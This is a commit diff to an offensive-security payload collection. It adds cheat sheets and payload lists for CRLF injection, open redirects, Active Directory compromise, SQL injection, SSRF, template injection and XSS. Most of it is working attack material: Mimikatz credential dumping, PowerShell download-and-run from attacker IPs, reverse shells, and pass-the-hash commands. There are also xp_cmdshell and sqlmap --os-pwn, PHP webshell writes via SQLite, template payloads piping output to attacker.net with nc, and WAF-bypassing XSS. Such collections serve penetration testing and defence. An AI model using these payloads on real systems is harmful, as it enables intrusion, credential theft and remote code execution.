SQLmap tips + Active Directory attacks + SQLite injections

CRLF injection/crlfinjection.txt

@@ -0,0 +1,17 @@
+/%%0a0aSet-Cookie:crlf=injection
+/%0aSet-Cookie:crlf=injection
+/%0d%0aSet-Cookie:crlf=injection
+/%0dSet-Cookie:crlf=injection
+/%23%0aSet-Cookie:crlf=injection
+/%23%0d%0aSet-Cookie:crlf=injection
+/%23%0dSet-Cookie:crlf=injection
+/%25%30%61Set-Cookie:crlf=injection
+/%25%30aSet-Cookie:crlf=injection
+/%250aSet-Cookie:crlf=injection
+/%25250aSet-Cookie:crlf=injection
+/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
+/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
+/%2F..%0d%0aSet-Cookie:crlf=injection
+/%3f%0d%0aSet-Cookie:crlf=injection
+/%3f%0dSet-Cookie:crlf=injection
+/%u000aSet-Cookie:crlf=injection

Methodology and Resources/Active Directory Attack.md

@@ -0,0 +1,88 @@
+# Active Directory Attacks
+
+## Most common paths to AD compromise
+  * MS14-068
+  * MS17-010 (Eternal Blue - Local Admin)
+    ```c
+    nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
+    ```
+  * Unconstrained Delegation (incl. pass-the-ticket)
+  * OverPass-the-Hash (Making the most of NTLM password hashes)
+  * Pivoting with Local Admin & Passwords in SYSVOL
+  * Dangerous Built-in Groups Usage
+  * Dumping AD Domain Credentials
+  * Golden Tickets
+  * Kerberoast
+  * Silver Tickets
+  * Trust Tickets
+
+
+## Tools
+  * [Impacket](https://github.com/CoreSecurity/impacket)
+  * Responder
+  * Mimikatz
+  * [Ranger](https://github.com/funkandwagnalls/ranger)
+  * BloodHound
+  * RottenPotato
+
+## Mimikatz
+```
+load mimikatz
+mimikatz_command -f sekurlsa::logonPasswords full
+```
+
+## PowerSploit
+```
+https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
+powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
+powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
+```
+
+
+## PrivEsc - Token Impersonation (RottenPotato)
+Binary available at : https://github.com/foxglovesec/RottenPotato      
+Binary available at : https://github.com/breenmachine/RottenPotatoNG   
+```c
+getuid
+getprivs
+use incognito
+list\_tokens -u
+cd c:\temp\
+execute -Hc -f ./rot.exe
+impersonate\_token "NT AUTHORITY\SYSTEM"
+```
+
+```
+Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
+Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
+Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
+```
+
+## PrivEsc - MS14-068
+```
+Exploit Python : https://www.exploit-db.com/exploits/35474/
+
+Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
+```
+
+## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
+```
+Powershell:
+https://www.exploit-db.com/exploits/39719/
+https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
+
+Binary exe : https://github.com/Meatballs1/ms16-032
+
+Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
+```
+
+## Kerberoast
+```
+https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
+https://room362.com/post/2016/kerberoast-pt1/
+```
+
+## Thanks to
+ * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
+ * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
+ * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -72,6 +72,10 @@ Powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 
+```powershell
+powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
+```
+
 Java
 ```java
 r = Runtime.getRuntime()
@@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```
 
+Access shortcuts, su, nano and autocomplete in a partially tty shell
+```
+ctrl+z
+stty raw -echo
+fg
+```
+/!\ OhMyZSH might break this trick
+
 (From within vi)
 ```
 :!bash
@@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 * [Spawning a TTY Shell](http://netsec.ws/?p=337)
+* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)

Methodology and Resources/Windows - Using credentials.md

@@ -12,6 +12,7 @@ creds
 ```
 
 ## Metasploit - Psexec
+Note: the password can be replaced by a hash to execute a `pass the hash` attack.
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
@@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
 python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
 ```
 
+## Crackmapexec (Pass The Hash)
+```
+cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
+```
+
 ## Winexe (Integrated to Kali)
 ```python
 winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
@@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
 ```
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 ```
+or with psexec(sysinternals)
+```
+psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+```
 
 ## Netuse (Windows)
 ```
@@ -69,6 +79,8 @@ PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
 ```
 
+
 ## Thanks
  - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
-- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)

Open redirect/openredirects.txt

@@ -0,0 +1,67 @@
+/%09/example.com
+/%2f%2fexample.com
+/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
+/%5cexample.com
+/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+/.example.com
+//%09/example.com
+//%5cexample.com
+///%09/example.com
+///%5cexample.com
+////%09/example.com
+////%5cexample.com
+/////example.com
+/////example.com/
+////\;@example.com
+////example.com/
+////example.com/%2e%2e
+////example.com/%2e%2e%2f
+////example.com/%2f%2e%2e
+////example.com/%2f..
+////example.com//
+///\;@example.com
+///example.com
+///example.com/
+///example.com/%2e%2e
+///example.com/%2e%2e%2f
+///example.com/%2f%2e%2e
+///example.com/%2f..
+///example.com//
+//example.com
+//example.com/
+//example.com/%2e%2e
+//example.com/%2e%2e%2f
+//example.com/%2f%2e%2e
+//example.com/%2f..
+//example.com//
+//google%00.com
+//google%E3%80%82com
+//https:///example.com/%2e%2e
+//https://example.com/%2e%2e%2f
+//https://example.com//
+/<>//example.com
+/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
+/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
+/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
+/\/\/example.com/
+/\/example.com/
+/example.com/%2f%2e%2e
+/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+/http://example.com
+/http:/example.com
+/https:/%5cexample.com/
+/https://%09/example.com
+/https://%5cexample.com
+/https:///example.com/%2e%2e
+/https:///example.com/%2f%2e%2e
+/https://example.com
+/https://example.com/
+/https://example.com/%2e%2e
+/https://example.com/%2e%2e%2f
+/https://example.com/%2f%2e%2e
+/https://example.com/%2f..
+/https://example.com//
+/https:example.com
+/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
+/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
+/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

Remote commands execution/README.md

@@ -67,6 +67,29 @@ Commands execution with a line return
 something%0Acat%20/etc/passwd
 ```
 
+Bypass blacklisted word with single quote
+```
+w'h'o'am'i
+```
+
+Bypass blacklisted word with double quote
+```
+w"h"o"am"i
+```
+
+Bypass blacklisted word with $@
+```
+who$@ami
+```
+
+Bypass zsh/bash/sh blacklist
+```
+echo $0
+-> /usr/bin/zsh
+echo whoami|$0
+```
+
+
 ## Time based data exfiltration
 Extracting data : char by char
 ```

SQL injection/MSSQL Injection.md

@@ -0,0 +1,80 @@
+# MSSQL Injection
+
+## MSSQL version
+```
+SELECT @@version
+```
+
+## MSSQL database name
+```
+SELECT DB_NAME()
+```
+
+## MSSQL List Databases
+```
+SELECT name FROM master..sysdatabases;
+SELECT DB_NAME(N); — for N = 0, 1, 2, …
+```
+
+## MSSQL List Column
+```
+SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+```
+
+## MSSQL List Tables
+```
+SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
+SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+```
+
+
+## MSSQL User Password
+```
+MSSQL 2000:
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
+
+MSSQL 2005
+SELECT name, password_hash FROM master.sys.sql_logins 
+SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+```
+
+## MSSQL Error based
+```
+For integer inputs : convert(int,@@version)
+For string inputs   : ' + convert(int,@@version) + '
+```
+
+## MSSQL Time based
+```
+ProductID=1;waitfor delay '0:0:10'--
+ProductID=1);waitfor delay '0:0:10'--
+ProductID=1';waitfor delay '0:0:10'--
+ProductID=1');waitfor delay '0:0:10'--
+ProductID=1));waitfor delay '0:0:10'--
+```
+
+## MSSQL Command execution
+```
+EXEC xp_cmdshell "net user";           
+EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
+EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
+```
+If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+```
+EXEC sp_configure 'show advanced options',1
+RECONFIGURE
+EXEC sp_configure 'xp_cmdshell',1
+RECONFIGURE
+```
+
+## MSSQL Make user DBA (DB admin)
+```
+EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+```
+
+## Thanks to
+ * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+ * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)

SQL injection/README.md

@@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
 
+Shell
+```
+SQL Shell
+python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell
+
+Simple Shell
+python sqlmap.py -u "http://example.com/?id=1"  -p id --os-shell
+
+Dropping a reverse-shell / meterpreter
+python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn
+```
+
+Using suffix to tamper the injection
+```
+python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
+```
 
 General tamper option and tamper's list
 ```
@@ -338,3 +354,5 @@ mysql> mysql> select version();
 * Second Order:
   - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
   - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
+* Sqlmap:
+  - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)

SQL injection/SQLite Injection.md

@@ -1,5 +1,9 @@
 # SQLite Injection
 
+## SQLite version
+```
+select sqlite_version();
+```
 
 ## Integer/String based - Extract table name
 ```
@@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
 
 ## Remote Command Execution using SQLite command - Attach Database
 ```
-ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+ATTACH DATABASE '/var/www/lol.php' AS lol;
 CREATE TABLE lol.pwn (dataz text);
-INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
+INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
 ```
 
 ## Remote Command Execution using SQLite command - Load_extension
@@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
 Note: By default this component is disabled
 
 ## Thanks to
-[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
+[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)

SSRF injection/README.md

@@ -90,6 +90,13 @@ Bypass using rare address
 http://0/
 ```
 
+Bypass using bash variables (curl only)
+```
+curl -v "http://evil$google.com"
+
+$google = ""
+```
+
 Bypass using tricks combination
 ```
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@@ -108,6 +115,7 @@ List:
 
 
 ## SSRF via URL Scheme
+
 Dict://   
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
 ```
@@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
 * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
 * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
+* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)

Server Side Template injections/README.md

@@ -1,47 +1,127 @@
 # Templates Injections
 
-Template injection allows an attacker to include template code into an existant (or not) template.
+> Template injection allows an attacker to include template code into an existant (or not) template.     
+
+Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
+e.g:
+```
+./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
+```
+
 
 ## Ruby
-#### Basic injection
+### Basic injection
 ```python
 <%= 7 * 7 %>
 ```
 
-#### Retrieve /etc/passwd
+### Retrieve /etc/passwd
 ```python
 <%= File.open('/etc/passwd').read %>
 ```
 
 
 ## Java
-#### Basic injection
+### Basic injection
 ```java
 ${{7*7}}
 ```
 
-#### Retrieve the system’s environment variables.
+### Retrieve the system’s environment variables.
 ```java
 ${T(java.lang.System).getenv()}
 ```
 
-#### Retrieve /etc/passwd
+### Retrieve /etc/passwd
 ```java
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
+## Twig
+### Basic injection
+```python
+{{7*7}}
+{{7*'7'}} would result in 49
+```
+
+### Template format
+```python
+$output = $twig > render (
+  'Dear' . $_GET['custom_greeting'],
+  array("first_name" => $user.first_name)
+);
+
+$output = $twig > render (
+  "Dear {first_name}",
+  array("first_name" => $user.first_name)
+);
+```
+
+### Code execution
+```python
+{{self}}
+{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
+{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+```
+
+
+## Smarty
+```python
+{php}echo `id`;{/php}
+{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
+```
+
+## Freemarker
+Default functionality.
+```python
+<#assign
+ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+```
+
+## Jade / Codepen
+```python
+- var x = root.process
+- x = x.mainModule.require
+- x = x('child_process')
+= x.exec('id | nc attacker.net 80')
+```
+
+## Velocity
+```python
+#set($str=$class.inspect("java.lang.String").type)
+#set($chr=$class.inspect("java.lang.Character").type)
+#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
+$ex.waitFor()
+#set($out=$ex.getInputStream())
+#foreach($i in [1..$out.available()])
+$str.valueOf($chr.toChars($out.read()))
+#end
+```
+
+## Mako
+```python
+<%
+import os
+x=os.popen('id').read()
+%>
+${x}
+```
+
+
 ## Jinja2
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 
-#### Basic injection
+
+### Basic injection
 ```python
 {{4*4}}[[5*5]]
+{{7*'7'}} would result in 7777777
 ```
 
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
-#### Template format
+### Template format
 ```python
 {% extends "layout.html" %}
 {% block body %}
@@ -54,12 +134,12 @@ The above injections have been tested on Flask application.
 
 ```
 
-#### Dump all used classes
+### Dump all used classes
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 ```
 
-#### Dump all config variables
+### Dump all config variables
 ```python
 {% for key, value in config.iteritems() %}
     <dt>{{ key|e }}</dt>
@@ -67,18 +147,18 @@ The above injections have been tested on Flask application.
 {% endfor %}
 ```
 
-#### Read remote file
+### Read remote file
 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 ```
 
-#### Write into remote file
+### Write into remote file
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
 ```
 
-#### Remote Code Execution via reverse shell
+### Remote Code Execution via reverse shell
 Listen for connexion
 ```
 nv -lnvp 8000
@@ -94,5 +174,5 @@ Inject this template
  * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
  * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
  * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
-#### Training
-[https://w3challs.com/](https://w3challs.com/)
+ * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
+ * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)

XSS injection/Files/XML XSS.xml

@@ -2,5 +2,17 @@
 	<head></head>
 	<body>
 		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
+
+		<info>
+		  <name>
+		    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
+		  </name>
+		    <description>
+		      <value>Hello</value>
+		    </description>
+		    <url>
+		      <value>http://google.com</value>
+		    </url>
+		</info>
 	</body>
-</html>
+</html>

XSS injection/README.md

@@ -71,6 +71,12 @@ XSS for HTML5
 <marquee onstart=alert(1)>
 ```
 
+XSS using script tag (external payload)
+```
+<script src=14.rs>
+you can alsoo specify an arbitratry payload with 14.rs/#payload
+e.g: 14.rs/#alert(document.domain)
+```
 
 XSS in META tag
 ```
@@ -147,7 +153,15 @@ XSS with vbscript: only IE
 vbscript:msgbox("XSS")
 ```
 ## XSS in files
-XSS in XML
+** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
+```
+<name>
+  <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
+</name>
+```
+
+
+XSS in XML      
 ```
 <html>
 <head></head>
@@ -432,6 +446,17 @@ Bypass case sensitive
 <sCrIpt>alert(1)</ScRipt>
 ```
 
+Bypass tag blacklist
+```
+<script x>
+<script x>alert('XSS')<script y>
+```
+
+Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
+```
+<img src='1' onerror='alert(0)' <
+```
+
 Bypass quotes for string
 ```
 String.fromCharCode(88,83,83)
@@ -486,10 +511,6 @@ Bypass space filter with "/" - IE/Firefox/Chrome/Safari
 <img/src='1'/onerror=alert(0)>
 ```
 
-Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
-```
-<img src='1' onerror='alert(0)' <
-```
 
 Bypass document blacklist
 ```
@@ -503,6 +524,7 @@ foo="text </script><script>alert(1)</script>";
 </script>
 ```
 
+
 Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
 ```
 window['alert'](0)
@@ -566,6 +588,22 @@ Bypass ';' using another character
 'te' instanceof alert('instanceof') instanceof 'xt';
 ```
 
+Bypass using HTML encoding
+```
+%26%2397;lert(1)
+```
+
+Bypass using Katakana (https://github.com/aemkei/katakana.js)
+```
+javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
+```
+
+Bypass using Octal encoding
+```
+javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
+```
+
+
 Bypass using Unicode
 ```
 Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
@@ -672,6 +710,12 @@ Exotic payloads
 <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
 ```
 
+## Incapsula WAF Bypass - 8th march
+```
+anythinglr00</script><script>alert(document.domain)</script>uxldz
+
+anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
+```
 
 ## More fun ?
 This section will be used for the "fun/interesting/useless" stuff.